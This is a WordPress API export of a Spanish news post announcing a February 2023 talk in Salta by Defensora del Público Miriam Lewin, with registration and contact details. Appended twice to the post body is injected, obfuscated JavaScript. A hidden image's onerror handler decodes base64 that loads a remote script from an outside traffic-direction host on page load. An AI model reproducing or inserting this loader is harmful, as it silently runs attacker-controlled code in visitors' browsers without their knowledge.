{"id":2228,"date":"2023-02-14T10:24:57","date_gmt":"2023-02-14T13:24:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2228"},"modified":"2025-08-14T00:23:18","modified_gmt":"2025-08-14T03:23:18","slug":"defensoria-del-publico-realizara-un-conversatorio-en-la-casa-de-la-cultura","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2228","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/defensoria-del-publico-realizara-un-conversatorio-en-la-casa-de-la-cultura-87860\">Defensor\u00eda del P\u00fablico realizar\u00e1 un conversatorio en la Casa de la Cultura<\/a>"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-background-color has-background wp-block-heading\">En el marco de la visita de Miriam Lewin junto a su equipo t\u00e9cnico, hoy se realizar\u00e1 una actividad con el objetivo de dar a conocer el rol de la Defensor\u00eda del P\u00fablico de Servicios de Comunicaci\u00f3n Audiovisual en la Provincia.<\/h4>\n\n\n\n<p>En el marco de viaje a la provincia de Salta de la Defensora del P\u00fablico,&nbsp;<strong>Miriam Lewin<\/strong>&nbsp;junto a su equipo t\u00e9cnico, se invita a la comunidad hoy martes 14 de febrero de 2023 de 15 a 18 horas&nbsp;a conversar sobre el rol de la Defensor\u00eda del P\u00fablico de Servicios de Comunicaci\u00f3n Audiovisual en la provincia.<\/p>\n\n\n\n<p>El encuentro est\u00e1 dirigido a periodistas, comunicadores\/as y profesionales de medios de radio y TV de la provincia.<\/p>\n\n\n\n<p>La convocatoria es para el d\u00eda martes 14 a las 15 en la Sala de Conferencias de Casa de la Cultura, Caseros 460. Asimismo, se hace extensiva la invitaci\u00f3n a periodistas y comunicadores de los municipios y provincias que deseen participar con entrada libre y gratuita, comprendiendo que las realidades laborales son totalmente diferentes.Las inscripciones se realizan a trav\u00e9s del siguiente Formulario en l\u00ednea:\u00a0<a href=\"https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSeeMb0O_y3pCE1F5RoXI9Toufbw_S0cvS_1ldGhG2R0Oja2-w\/viewform\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSeeMb0O_y3pCE1F5RoXI9Toufbw_S0cvS_1ldGhG2R0Oja2-w\/viewform<\/a><\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n, comunicarse al 3875012800 o al 3875965829<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/defensoria-del-publico-realizara-un-conversatorio-en-la-casa-de-la-cultura-87860\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de la visita de Miriam Lewin junto a su equipo t\u00e9cnico, hoy se realizar\u00e1 una actividad con el objetivo de dar a conocer el rol de la Defensor\u00eda del P\u00fablico de Servicios de Comunicaci\u00f3n Audiovisual en la Provincia. En el marco de viaje a la provincia de Salta de la Defensora del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2229,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,17],"tags":[],"class_list":{"0":"post-2228","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2228"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2228"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2228\/revisions"}],"predecessor-version":[{"id":7176,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2228\/revisions\/7176"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2229"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}